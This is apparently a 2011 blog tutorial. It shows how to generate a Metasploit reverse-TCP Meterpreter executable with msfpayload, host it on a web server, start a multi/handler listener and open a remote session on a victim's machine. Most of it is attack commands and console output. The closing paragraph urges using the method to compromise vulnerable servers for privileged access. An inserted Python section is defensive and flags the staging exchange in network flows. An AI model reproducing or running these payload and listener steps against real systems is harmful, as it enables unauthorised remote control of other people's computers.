Wednesday, June 22, 2011

Metasploit Binary Payload

Once again we are going to start off simple. We are going to use Metasploit to make a binary payload that opens a reverse TCP Meterpreter session. First we are going to export the Metasploit Meterpreter payload to a file, which we do with the following command. LHOST is your computer's IP address, so the victim knows where to connect back to. We are going to redirect the output of the command to a file named meterpreter.exe in the root of my HTTP server for simplicity.

[root@localhost app]# ./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.70.197 X >/var/www/html/meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"10.10.13.247"}
Next we are going to give the file read/write permission.

[root@localhost app]# chmod 665 /var/www/html/meterpreter.exe

Now on the attacking box we need to set up a Meterpreter listener.

[root@localhost app]# ./msfconsole
=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 37 days ago (2011.05.16)

Warning: This copy of the Metasploit Framework was last updated 37 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST x.x.70.197
LHOST => x.x.70.197
msf exploit(handler) > exploit
[*] Started reverse handler on x.x.70.197:4444
[*] Starting the payload handler...

Next, run the executable on the victim's computer (I'll show a better way to do this later down the road).

[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (x.x.70.197:4444 -> x.x.200.252:1227)
meterpreter >
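From the defender's side, the staging exchange above is recognisable on the wire: the stager connects out, sends nothing, and the handler answers first with the stage prefixed by its length as a 32-bit little-endian integer. The following Python is an added example (not code from the original post or from Metasploit) that applies that heuristic to flow records; the flow-record fields, the size bounds and the sample bytes are assumptions made for this example.

```python
import struct

# Bounds on a plausible stage size; these are assumptions chosen for this
# example, not values taken from Metasploit itself.
MIN_STAGE = 64
MAX_STAGE = 16 * 1024 * 1024


def stage_length_prefix(server_first):
    """Return the declared length if the server's first bytes look like a
    length-prefixed blob ([uint32 little-endian length][data]), else None."""
    if len(server_first) < 4:
        return None
    declared = struct.unpack('<I', server_first[:4])[0]
    body = len(server_first) - 4
    # Text banners ("SSH-", "220 ", "HTTP/") decode to huge numbers and fail
    # the upper bound; a prefix smaller than the data that already followed
    # it in the same chunk is not a length prefix either.
    if declared < MIN_STAGE or declared > MAX_STAGE or declared < body:
        return None
    return declared


def flag_flow(flow):
    """Return a short reason if a flow looks like a reverse-TCP staging
    exchange: the client connected, sent nothing, and the server spoke
    first with a length-prefixed blob. Return None otherwise."""
    if flow['client_first_len'] != 0:
        return None
    declared = stage_length_prefix(flow['server_first'])
    if declared is None:
        return None
    return 'server-first length-prefixed stage of %d bytes on port %d' % (
        declared, flow['dst_port'])


def scan_flows(flows):
    """Run flag_flow over a list of flow records and collect the hits."""
    hits = [(f['dst_port'], flag_flow(f)) for f in flows]
    return [(port, reason) for port, reason in hits if reason]


# Constructed sample flows (not real captures). The first mimics the
# "Sending stage (2834 bytes)" step with filler bytes in place of the stage.
SAMPLE_FLOWS = [
    {'dst_port': 4444, 'client_first_len': 0,
     'server_first': struct.pack('<I', 2834) + b'\x90' * 2834},
    {'dst_port': 22, 'client_first_len': 0,
     'server_first': b'SSH-2.0-OpenSSH_5.3\r\n'},
    {'dst_port': 80, 'client_first_len': 78,
     'server_first': b'HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n'},
]
```

Only the constructed port-4444 flow is reported; the SSH banner is rejected by the size bound and the HTTP flow because the client spoke first.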

This opens up a lot of possibilities. If you want to compromise a server, you can find one that is vulnerable to the technique from my last post, put in a file that gives you command line access to the server, and run the executable on the server itself. This way you get a privileged session to the entire server, as opposed to a single directory if the web server is jailed.
